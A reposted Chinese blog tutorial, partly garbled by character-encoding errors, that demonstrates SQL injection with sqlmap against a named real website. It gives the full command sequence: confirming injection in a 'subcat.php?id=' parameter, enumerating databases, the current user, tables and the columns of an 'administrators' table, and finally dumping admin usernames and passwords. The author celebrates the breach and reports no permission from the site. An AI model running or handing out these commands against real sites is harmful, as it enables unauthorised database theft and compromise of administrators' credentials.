转载:sqlmap的应用实战
原文鏈接:https://blog.csdn.net/vala0901/article/details/71548954
有幸在kali中文網上查看了很多大神寫的sqlmap的教程,其中還在大神的文章里找到了一個悲催的網站www.bible-history.com/,所以就按照前人總結,給這個悲催的網站脫褲了。。。。下面詳細的講一下怎么給網站脫褲,啊,不,是拖庫。。。。。
1.首先要知道可以注入的網址是什么
? ? http://www.bible-history.com/subcat.php?id=2
2.接著就可以針對這個網址來檢測能不能注入,以及查看它的所有數據庫列表了
? sqlmap -u "http://www.bible-history.com/subcat.php?id=2" --dbs ?(注意:dbs前面是兩個橫杠)
?
注入的結果表示:
(1)注入參數id為GET注入,注入類型有四種,分別是:boolean-based blind/error-based/time-based blind/union query
(2)web應用程序技術為:Apache ?PHP
(3)數據庫類型:MySQL
(4)畫紅圈的是網址所有的數據庫名單
其中可能有你輸入[Y/N]的,統(tǒng)統(tǒng)回車解決吧。
?
3.這時,我們發(fā)現這個網址存在注入,并且拿到了所有數據庫名單。我們決定查看web當前使用的數據庫
? sqlmap -u "http://www.bible-history.com/subcat.php?id=2" --current-db
紅線畫出的就是當前使用的數據庫:bible_history,一會我們會針對這個數據庫下手。。。
4.探測web數據庫使用的賬號
? sqlmap -u "http://www.bible-history.com/subcat.php?id=2" --current-user
可見當前的數據庫使用賬戶為:bho@localhost
?
5.下面我們來探測bible_history這個數據庫里的所有表
sqlmap -u "http://www.bible-history.com/subcat.php?id=2" -D bible_history --tables
其中:
(1)D指出數據庫名字
(2)tables列出表
?
6.下面我想探測的是administrators這個表的列
sqlmap -u "http://www.bible-history.com/subcat.php?id=2" -D bible_history -T administrators --columns
其中:
(1)T指定要列出字段的表
(2)columns列出列
?
7.表中字段明顯拿到了。。。。下面一步還用說么?果斷脫褲。。。。好開心。。。。
sqlmap -u "http://www.bible-history.com/subcat.php?id=2" -D bible_history -T administrators -C admin_id,admin_username,admin_password --dump
成功!!!
(PS:自從逛了大神技術貼,就再也不能好好說“拖庫”了。。。滿腦子都是給web脫褲。。。。我天朝的男程序員們就是如此悶騷闊愛)認真臉。。。
總結
以上是生活随笔為你收集整理的转载:sqlmap的应用实战的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 转载:python3 安装pycrypt
- 下一篇: CTF-RSA-tool 安装全过程